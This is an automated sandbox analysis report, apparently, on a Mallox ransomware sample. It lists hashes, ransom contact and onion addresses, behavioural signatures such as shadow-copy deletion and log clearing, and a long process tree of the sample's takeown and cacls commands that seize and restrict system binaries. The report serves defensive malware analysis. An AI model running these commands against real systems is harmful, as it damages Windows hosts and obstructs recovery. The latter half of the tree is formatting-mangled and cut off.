Analysis
max time kernel: 105s
max time network: 152s
platform: windows10-2004_x64
resource: win10v2004-20230220-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
submitted: 28-03-2023 18:45
Static task: static1
Behavioral task: behavioral1 (Sample: tmp.exe, Resource: win7-20230220-en)
Behavioral task: behavioral2 (Sample: tmp.exe, Resource: win10v2004-20230220-en)
General
Target: tmp.exe
Size: 530KB
MD5: 57c683e8ab7b7e1390c037c9a97c7688
SHA1: 316e4c90085677c5a5f9ccb66ec64c701a89afc7
SHA256: 060ed94db064924a90065a5f4efb50f938c52619ca003f096482353e444bd096
SHA512: 7462612a9adb287674437924e1ae740c971cac89dfef7290ffd95df618e2b88d25bbafbef0b76dda418ebc2547fa2674c04a455c0341195e13b8fc71387bc953
SSDEEP: 12288:5hCkSyRGBePYCVWFQ28zqIN6wqFYvt3V/RiR:3CkSyuCYSWFdoqIIwBt3lRiR
Malware Config
Extracted from: C:\Program Files\7-Zip\Lang\FILE RECOVERY.txt
Contact: mallox.resurrection@onionmail.org
URL: http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin
URL: http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion
Signatures
Clears Windows event logs (1 TTPs, 64 IoCs): wevtutil.exe
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.
Stops running service(s) (3 TTPs)
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up the country code configured in the registry, likely for geofencing.
Processes: tmp.exe
Key value queried (2x): \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation
Modifies file permissions (1 TTPs, 18 IoCs)
Processes: takeown.exe, PIDs 5944, 4616, 640, 2228, 1800, 4136, 888, 6216, 4880, 4884, 4136, 644, 3556, 3908, 7016, 4020, 816, 652
Enumerates connected drives (3 TTPs, 24 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Processes: tmp.exe
File opened (read-only): \??\T:, \??\X:, \??\F:, \??\I:, \??\J:, \??\N:, \??\P:, \??\S:, \??\U:, \??\V:, \??\W:, \??\H:, \??\L:, \??\M:, \??\Q:, \??\R:, \??\O:, \??\Y:, \??\Z:, \??\A:, \??\B:, \??\E:, \??\G:, \??\K:
Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Network flow 29: api.ipify.org
Suspicious use of SetThreadContext (1 IoCs)
Processes: PID 3140 (tmp.exe) set thread context of PID 3720 (tmp.exe)
Drops file in Program Files directory (64 IoCs): tmp.exe
Launches sc.exe (64 IoCs)
Sc.exe is a Windows utility to control services on the system.
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Discovers systems in the same network (1 TTPs, 2 IoCs)
Enumerates processes with tasklist (1 TTPs, 6 IoCs)
Processes: tasklist.exe, PIDs 6704, 7804, 2832, 5764, 5580, 5984
Interacts with shadow copies (2 TTPs, 1 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes: vssadmin.exe, PID 1456
Kills process with taskkill (64 IoCs): taskkill.exe
Runs net.exe
Suspicious behavior: EnumeratesProcesses (4 IoCs)
Processes: powershell.exe PID 4160 (2x), tmp.exe PID 3720 (2x)
Suspicious use of AdjustPrivilegeToken (64 IoCs): tmp.exe, powershell.exe, takeown.exe, vssvc.exe, taskkill.exe, tasklist.exe, sc.exe, net.exe, wevtutil.exe (privileges enabled: SeDebugPrivilege, SeTakeOwnershipPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege, SeSecurityPrivilege)
Suspicious use of WriteProcessMemory (64 IoCs): tmp.exe, cmd.exe
System policy modification (1 TTPs, 1 IoCs)
Processes: tmp.exe
Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0"
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes (tree depth in brackets)
[1] C:\Users\Admin\AppData\Local\Temp\tmp.exe: "C:\Users\Admin\AppData\Local\Temp\tmp.exe"
  - Checks computer location settings
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  [2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwAwAA==
    (the -ENC argument is UTF-16LE base64 and decodes to: start-sleep -seconds 30)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Wvjrrzxdkill$-arab.bat" "
    - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\reg.exe: reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f
    [3] C:\Windows\SysWOW64\takeown.exe: takeown /f C:\Windows\system32\cmd.exe /a
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\cmd.exe /g Administrators:f
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\cmd.exe /e /g Users:r
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\cmd.exe /e /g Administrators:r
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\cmd.exe /e /d SERVICE
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\cmd.exe /e /d mssqlserver
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      [4] C:\Windows\SysWOW64\net1.exe: C:\Windows\system32\net1 stop HaoZipSvc
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\cmd.exe /e /d "network service"
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\cmd.exe /e /g system:r
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\cmd.exe /e /d mssql$sqlexpress
    [3] C:\Windows\SysWOW64\takeown.exe: takeown /f C:\Windows\SysWOW64\cmd.exe /a
      - Modifies file permissions
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\cmd.exe /g Administrators:f
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\cmd.exe /e /g Users:r
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\cmd.exe /e /d SERVICE
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\cmd.exe /e /d "network service"
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\cmd.exe /e /g system:r
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\cmd.exe /e /d mssql$sqlexpress
    [3] C:\Windows\SysWOW64\takeown.exe: takeown /f C:\Windows\system32\net.exe /a
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\net.exe /g Administrators:f
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\net.exe /e /g Users:r
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\net.exe /e /g Administrators:r
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\net.exe /e /d SERVICE
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\net.exe /e /d mssqlserver
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\net.exe /e /d "network service"
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\net.exe /e /d system
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\net.exe /e /d mssql$sqlexpress
    [3] C:\Windows\SysWOW64\takeown.exe: takeown /f C:\Windows\SysWOW64\net.exe /a
      - Modifies file permissions
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\net.exe /g Administrators:f
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\net.exe /e /g Users:r
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\net.exe /e /g Administrators:r
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\net.exe /e /d SERVICE
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\net.exe /e /d mssqlserver
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\net.exe /e /d "network service"
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\net.exe /e /d system
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\net.exe /e /d mssql$sqlexpress
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    [3] C:\Windows\SysWOW64\takeown.exe: takeown /f C:\Windows\system32\net1.exe /a
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\net1.exe /g Administrators:f
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\net1.exe /e /g Users:r
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\net1.exe /e /g Administrators:r
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\net1.exe /e /d SERVICE
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\net1.exe /e /d mssqlserver
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\net1.exe /e /d "network service"
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\net1.exe /e /d system
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\net1.exe /e /d mssql$sqlexpress
    [3] C:\Windows\SysWOW64\takeown.exe: takeown /f C:\Windows\SysWOW64\net1.exe /a
      - Modifies file permissions
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\net1.exe /g Administrators:f
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\net1.exe /e /g Users:r
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\net1.exe /e /g Administrators:r
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\net1.exe /e /d SERVICE
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\net1.exe /e /d mssqlserver
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\net1.exe /e /d "network service"
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\net1.exe /e /d system
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\net1.exe /e /d mssql$sqlexpress
    [3] C:\Windows\SysWOW64\takeown.exe: takeown /f C:\Windows\system32\mshta.exe /a
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\mshta.exe /g Administrators:f
    [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\mshta.exe /e /g Users:r
    [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\mshta.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\FTP.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\FTP.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\wscript.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\wscript.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\cscript.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\cscript.exe /a3⤵
- Modifies file permissions
-
